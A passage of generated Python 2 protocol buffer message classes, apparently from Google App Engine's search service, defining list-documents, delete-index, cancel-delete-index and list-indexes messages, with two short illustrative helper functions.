d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
2: "app_id",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ListDocumentsRequest'
class ListDocumentsResponse(ProtocolBuffer.ProtocolMessage):
has_status_ = 0
def __init__(self, contents=None):
self.status_ = RequestStatus()
self.document_ = []
if contents is not None: self.MergeFromString(contents)
def status(self): return self.status_
def mutable_status(self): self.has_status_ = 1; return self.status_
def clear_status(self):self.has_status_ = 0; self.status_.Clear()
def has_status(self): return self.has_status_
def document_size(self): return len(self.document_)
def document_list(self): return self.document_
def document(self, i):
return self.document_[i]
def mutable_document(self, i):
return self.document_[i]
def add_document(self):
x = Document()
self.document_.append(x)
return x
def clear_document(self):
self.document_ = []
def MergeFrom(self, x):
assert x is not self
if (x.has_status()): self.mutable_status().MergeFrom(x.status())
for i in xrange(x.document_size()): self.add_document().CopyFrom(x.document(i))
def Equals(self, x):
if x is self: return 1
if self.has_status_ != x.has_status_: return 0
if self.has_status_ and self.status_ != x.status_: return 0
if len(self.document_) != len(x.document_): return 0
for e1, e2 in zip(self.document_, x.document_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_status_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: status not set.')
elif not self.status_.IsInitialized(debug_strs): initialized = 0
for p in self.document_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.status_.ByteSize())
n += 1 * len(self.document_)
for i in xrange(len(self.document_)): n += self.lengthString(self.document_[i].ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_status_):
n += 1
n += self.lengthString(self.status_.ByteSizePartial())
n += 1 * len(self.document_)
for i in xrange(len(self.document_)): n += self.lengthString(self.document_[i].ByteSizePartial())
return n
def Clear(self):
self.clear_status()
self.clear_document()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSize())
self.status_.OutputUnchecked(out)
for i in xrange(len(self.document_)):
out.putVarInt32(18)
out.putVarInt32(self.document_[i].ByteSize())
self.document_[i].OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_status_):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSizePartial())
self.status_.OutputPartial(out)
for i in xrange(len(self.document_)):
out.putVarInt32(18)
out.putVarInt32(self.document_[i].ByteSizePartial())
self.document_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_status().TryMerge(tmp)
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_document().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_status_:
res+=prefix+"status <\n"
res+=self.status_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt=0
for e in self.document_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("document%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
kdocument = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
2: "document",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ListDocumentsResponse'
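# --- Editorial sketch (not part of the generated protocol) ------------------
# A minimal round trip through the ListDocuments messages defined above,
# assuming IndexSpec (defined earlier in this module) exposes set_name() for
# its required name field.  The helper name is illustrative only.
def _example_list_documents_round_trip(serialized_response=None):
  request = ListDocumentsRequest()
  params = request.mutable_params()
  params.mutable_index_spec().set_name('books')  # index_spec.name is required
  params.set_limit(10)
  params.set_keys_only(1)
  encoded_request = request.Encode()  # wire-format string; raises if uninitialized
  if serialized_response is not None:
    response = ListDocumentsResponse(serialized_response)
    return encoded_request, response.document_list()
  return encoded_request, []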
class DeleteIndexParams(ProtocolBuffer.ProtocolMessage):
has_index_spec_ = 0
def __init__(self, contents=None):
self.index_spec_ = IndexSpec()
if contents is not None: self.MergeFromString(contents)
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def MergeFrom(self, x):
assert x is not self
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
def Equals(self, x):
if x is self: return 1
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.index_spec_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
return n
def Clear(self):
self.clear_index_spec()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_index_spec_):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kindex_spec = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "index_spec",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteIndexParams'
class DeleteIndexRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = DeleteIndexParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 18:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
2: "app_id",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteIndexRequest'
class DeleteIndexResponse(ProtocolBuffer.ProtocolMessage):
has_status_ = 0
def __init__(self, contents=None):
self.status_ = RequestStatus()
if contents is not None: self.MergeFromString(contents)
def status(self): return self.status_
def mutable_status(self): self.has_status_ = 1; return self.status_
def clear_status(self):self.has_status_ = 0; self.status_.Clear()
def has_status(self): return self.has_status_
def MergeFrom(self, x):
assert x is not self
if (x.has_status()): self.mutable_status().MergeFrom(x.status())
def Equals(self, x):
if x is self: return 1
if self.has_status_ != x.has_status_: return 0
if self.has_status_ and self.status_ != x.status_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_status_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: status not set.')
elif not self.status_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.status_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_status_):
n += 1
n += self.lengthString(self.status_.ByteSizePartial())
return n
def Clear(self):
self.clear_status()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSize())
self.status_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_status_):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSizePartial())
self.status_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_status().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_status_:
res+=prefix+"status <\n"
res+=self.status_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteIndexResponse'
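# --- Editorial sketch (not part of the generated protocol) ------------------
# Shows the IsInitialized()/debug_strs pattern used throughout this module:
# a DeleteIndexRequest is only encodable once its required params.index_spec
# is populated.  The helper name is illustrative only.
def _example_delete_index_request(index_name, app_id=None):
  request = DeleteIndexRequest()
  request.mutable_params().mutable_index_spec().set_name(index_name)
  if app_id is not None:
    request.set_app_id(app_id)
  errors = []
  if not request.IsInitialized(errors):
    raise ValueError('incomplete request: %s' % ', '.join(errors))
  return request.Encode()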
class CancelDeleteIndexParams(ProtocolBuffer.ProtocolMessage):
has_index_spec_ = 0
def __init__(self, contents=None):
self.index_spec_ = IndexSpec()
if contents is not None: self.MergeFromString(contents)
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def MergeFrom(self, x):
assert x is not self
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
def Equals(self, x):
if x is self: return 1
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.index_spec_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
return n
def Clear(self):
self.clear_index_spec()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_index_spec_):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kindex_spec = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "index_spec",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.CancelDeleteIndexParams'
class CancelDeleteIndexRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = CancelDeleteIndexParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 18:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
2: "app_id",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.CancelDeleteIndexRequest'
class CancelDeleteIndexResponse(ProtocolBuffer.ProtocolMessage):
has_status_ = 0
def __init__(self, contents=None):
self.status_ = RequestStatus()
if contents is not None: self.MergeFromString(contents)
def status(self): return self.status_
def mutable_status(self): self.has_status_ = 1; return self.status_
def clear_status(self):self.has_status_ = 0; self.status_.Clear()
def has_status(self): return self.has_status_
def MergeFrom(self, x):
assert x is not self
if (x.has_status()): self.mutable_status().MergeFrom(x.status())
def Equals(self, x):
if x is self: return 1
if self.has_status_ != x.has_status_: return 0
if self.has_status_ and self.status_ != x.status_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_status_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: status not set.')
elif not self.status_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.status_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_status_):
n += 1
n += self.lengthString(self.status_.ByteSizePartial())
return n
def Clear(self):
self.clear_status()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSize())
self.status_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_status_):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSizePartial())
self.status_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_status().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_status_:
res+=prefix+"status <\n"
res+=self.status_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.CancelDeleteIndexResponse'
class ListIndexesParams(ProtocolBuffer.ProtocolMessage):
has_fetch_schema_ = 0
fetch_schema_ = 0
has_limit_ = 0
limit_ = 20
has_namespace_ = 0
namespace_ = ""
has_start_index_name_ = 0
start_index_name_ = ""
has_include_start_index_ = 0
include_start_index_ = 1
has_index_name_prefix_ = 0
index_name_prefix_ = ""
has_offset_ = 0
offset_ = 0
has_source_ = 0
source_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def fetch_schema(self): return self.fetch_schema_
def set_fetch_schema(self, x):
self.has_fetch_schema_ = 1
self.fetch_schema_ = x
def clear_fetch_schema(self):
if self.has_fetch_schema_:
self.has_fetch_schema_ = 0
self.fetch_schema_ = 0
def has_fetch_schema(self): return self.has_fetch_schema_
def limit(self): return self.limit_
def set_limit(self, x):
self.has_limit_ = 1
self.limit_ = x
def clear_limit(self):
if self.has_limit_:
self.has_limit_ = 0
self.limit_ = 20
def has_limit(self): return self.has_limit_
def namespace(self): return self.namespace_
def set_namespace(self, x):
self.has_namespace_ = 1
self.namespace_ = x
def clear_namespace(self):
if self.has_namespace_:
self.has_namespace_ = 0
self.namespace_ = ""
def has_namespace(self): return self.has_namespace_
def start_index_name(self): return self.start_index_name_
def set_start_index_name(self, x):
self.has_start_index_name_ = 1
self.start_index_name_ = x
def clear_start_index_name(self):
if self.has_start_index_name_:
self.has_start_index_name_ = 0
self.start_index_name_ = ""
def has_start_index_name(self): return self.has_start_index_name_
def include_start_index(self): return self.include_start_index_
def set_include_start_index(self, x):
self.has_include_start_index_ = 1
self.include_start_index_ = x
def clear_include_start_index(self):
if self.has_include_start_index_:
self.has_include_start_index_ = 0
self.include_start_index_ = 1
def has_include_start_index(self): return self.has_include_start_index_
def index_name_prefix(self): return self.index_name_prefix_
def set_index_name_prefix(self, x):
self.has_index_name_prefix_ = 1
self.index_name_prefix_ = x
def clear_index_name_prefix(self):
if self.has_index_name_prefix_:
self.has_index_name_prefix_ = 0
self.index_name_prefix_ = ""
def has_index_name_prefix(self): return self.has_index_name_prefix_
def offset(self): return self.offset_
def set_offset(self, x):
self.has_offset_ = 1
self.offset_ = x
def clear_offset(self):
if self.has_offset_:
self.has_offset_ = 0
self.offset_ = 0
def has_offset(self): return self.has_offset_
def source(self): return self.source_
def set_source(self, x):
self.has_source_ = 1
self.source_ = x
def clear_source(self):
if self.has_source_:
self.has_source_ = 0
self.source_ = 0
def has_source(self): return self.has_source_
def MergeFrom(self, x):
assert x is not self
if (x.has_fetch_schema()): self.set_fetch_schema(x.fetch_schema())
if (x.has_limit()): self.set_limit(x.limit())
if (x.has_namespace()): self.set_namespace(x.namespace())
if (x.has_start_index_name()): self.set_start_index_name(x.start_index_name())
if (x.has_include_start_index()): self.set_include_start_index(x.include_start_index())
if (x.has_index_name_prefix()): self.set_index_name_prefix(x.index_name_prefix())
if (x.has_offset()): self.set_offset(x.offset())
if (x.has_source()): self.set_source(x.source())
def Equals(self, x):
if x is self: return 1
if self.has_fetch_schema_ != x.has_fetch_schema_: return 0
if self.has_fetch_schema_ and self.fetch_schema_ != x.fetch_schema_: return 0
if self.has_limit_ != x.has_limit_: return 0
if self.has_limit_ and self.limit_ != x.limit_: return 0
if self.has_namespace_ != x.has_namespace_: return 0
if self.has_namespace_ and self.namespace_ != x.namespace_: return 0
if self.has_start_index_name_ != x.has_start_index_name_: return 0
if self.has_start_index_name_ and self.start_index_name_ != x.start_index_name_: return 0
if self.has_include_start_index_ != x.has_include_start_index_: return 0
if self.has_include_start_index_ and self.include_start_index_ != x.include_start_index_: return 0
if self.has_index_name_prefix_ != x.has_index_name_prefix_: return 0
if self.has_index_name_prefix_ and self.index_name_prefix_ != x.index_name_prefix_: return 0
if self.has_offset_ != x.has_offset_: return 0
if self.has_offset_ and self.offset_ != x.offset_: return 0
if self.has_source_ != x.has_source_: return 0
if self.has_source_ and self.source_ != x.source_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_fetch_schema_): n += 2
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_namespace_): n += 1 + self.lengthString(len(self.namespace_))
if (self.has_start_index_name_): n += 1 + self.lengthString(len(self.start_index_name_))
if (self.has_include_start_index_): n += 2
if (self.has_index_name_prefix_): n += 1 + self.lengthString(len(self.index_name_prefix_))
if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
if (self.has_source_): n += 1 + self.lengthVarInt64(self.source_)
return n
def ByteSizePartial(self):
n = 0
if (self.has_fetch_schema_): n += 2
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_namespace_): n += 1 + self.lengthString(len(self.namespace_))
if (self.has_start_index_name_): n += 1 + self.lengthString(len(self.start_index_name_))
if (self.has_include_start_index_): n += 2
if (self.has_index_name_prefix_): n += 1 + self.lengthString(len(self.index_name_prefix_))
if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
if (self.has_source_): n += 1 + self.lengthVarInt64(self.source_)
return n
def Clear(self):
self.clear_fetch_schema()
self.clear_limit()
self.clear_namespace()
self.clear_start_index_name()
self.clear_include_start_index()
self.clear_index_name_prefix()
self.clear_offset()
self.clear_source()
def OutputUnchecked(self, out):
if (self.has_fetch_schema_):
out.putVarInt32(8)
out.putBoolean(self.fetch_schema_)
if (self.has_limit_):
out.putVarInt32(16)
out.putVarInt32(self.limit_)
if (self.has_namespace_):
out.putVarInt32(26)
out.putPrefixedString(self.namespace_)
if (self.has_start_index_name_):
out.putVarInt32(34)
out.putPrefixedString(self.start_index_name_)
if (self.has_include_start_index_):
out.putVarInt32(40)
out.putBoolean(self.include_start_index_)
if (self.has_index_name_prefix_):
out.putVarInt32(50)
out.putPrefixedString(self.index_name_prefix_)
if (self.has_offset_):
out.putVarInt32(56)
out.putVarInt32(self.offset_)
if (self.has_source_):
out.putVarInt32(64)
out.putVarInt32(self.source_)
def OutputPartial(self, out):
if (self.has_fetch_schema_):
out.putVarInt32(8)
out.putBoolean(self.fetch_schema_)
if (self.has_limit_):
out.putVarInt32(16)
out.putVarInt32(self.limit_)
if (self.has_namespace_):
out.putVarInt32(26)
out.putPrefixedString(self.namespace_)
if (self.has_start_index_name_):
out.putVarInt32(34)
out.putPrefixedString(self.start_index_name_)
if (self.has_include_start_index_):
out.putVarInt32(40)
out.putBoolean(self.include_start_index_)
if (self.has_index_name_prefix_):
out.putVarInt32(50)
out.putPrefixedString(self.index_name_prefix_)
if (self.has_offset_):
out.putVarInt32(56)
out.putVarInt32(self.offset_)
if (self.has_source_):
out.putVarInt32(64)
out.putVarInt32(self.source_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_fetch_schema(d.getBoolean())
continue
if tt == 16:
self.set_limit(d.getVarInt32())
continue
if tt == 26:
self.set_namespace(d.getPrefixedString())
continue
if tt == 34:
self.set_start_index_name(d.getPrefixedString())
continue
if tt == 40:
self.set_include_start_index(d.getBoolean())
continue
if tt == 50:
self.set_index_name_prefix(d.getPrefixedString())
continue
if tt == 56:
self.set_offset(d.getVarInt32())
continue
if tt == 64:
self.set_source(d.getVarInt32())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
